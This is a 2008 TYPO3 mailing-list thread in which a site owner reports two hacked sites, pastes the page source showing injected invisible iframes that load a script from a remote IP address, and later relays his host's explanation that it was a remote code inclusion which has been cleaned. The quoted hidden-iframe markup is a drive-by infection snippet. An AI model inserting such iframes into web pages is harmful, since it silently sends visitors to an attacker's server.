[TYPO3] Typo3 sites HACKED!

Theo Kotey tkotey at gmail.com
Thu Mar 20 15:06:20 CET 2008


Theo Kotey wrote:
> ries van Twisk wrote:
>> may be this will give you a clue:
>>
>>> <body _dragdropupload="true" onload="T3_onloadWrapper();">
>>
>> Do you have a drag/drop upload tool in typo3??
>>
>> Ries
>>
>> On Mar 20, 2008, at 8:14 AM, Ton Akveld [netcreators] wrote:
>>
>>> Hi Theo,
>>>
>>> This is probably caused by your server being to 'open' to the general 
>>> 'public'...
>>> The ip is from Hong Kong...
>>>
>>> Good luck,
>>>
>>> Ton
>>>
>>>
>>>
>>> Theo Kotey schreef:
>>>> Hi List
>>>>
>>>> Two of my Typo3-running website have been hacked. I am trying to 
>>>> figure out how but there is an unknown ip address 58.65.236.89 which 
>>>> belongs to HostFresh. Does anybody have an info on these guys?
>>>>
>>>> My website are quite slow and shows some error messages like
>>>>
>>>> Warning: Cannot modify header information - headers already sent by 
>>>> (output started at 
>>>> /home/micropro/public_html/typo3_src/t3lib/class.t3lib_timetrack.php:595) 
>>>> in 
>>>> /home/micropro/public_html/typo3_src/t3lib/class.t3lib_userauth.php 
>>>> on line 278
>>>>
>>>> When I debugg the site using Firebug this is what I get below
>>>>
>>>> ########################################################################## 
>>>>
>>>>
>>>> <html>
>>>> <head>
>>>> </head>
>>>> <body _dragdropupload="true" onload="T3_onloadWrapper();">
>>>> <iframe width="0" height="0" border="0" 
>>>> src="http://58.65.236.89/in3/index.php">
>>>> </iframe>
>>>> <iframe width="0" height="0" border="0" 
>>>> src="http://58.65.236.89/in3/index.php">
>>>> </iframe>
>>>> <iframe width="0" height="0" border="0" 
>>>> src="http://58.65.236.89/in3/index.php">
>>>>
> Non that I know off
My hosting provider Siteground.com managed to solve my problem 
(Hooorrrayy!!!).
  Here's what they have to say

#############################################
Hello,

Thank you for contacting our Support Center. I've checked your account 
and it seems that the hack was actually an remote code inclusion only. 
Which means that no other damage, apart from the iframes, have been done.

I've cleaned the code of your application and that should have fixed the 
problem. Could you please check?

If you have any other questions or comments, please don't hesitate to 
contact us!

Best Regards,
Val M.
Shift Supervisor
http://www.SiteGround.com
#############################################

These guys are the best and they solved my problem in 7 mins.


More information about the TYPO3-english mailing list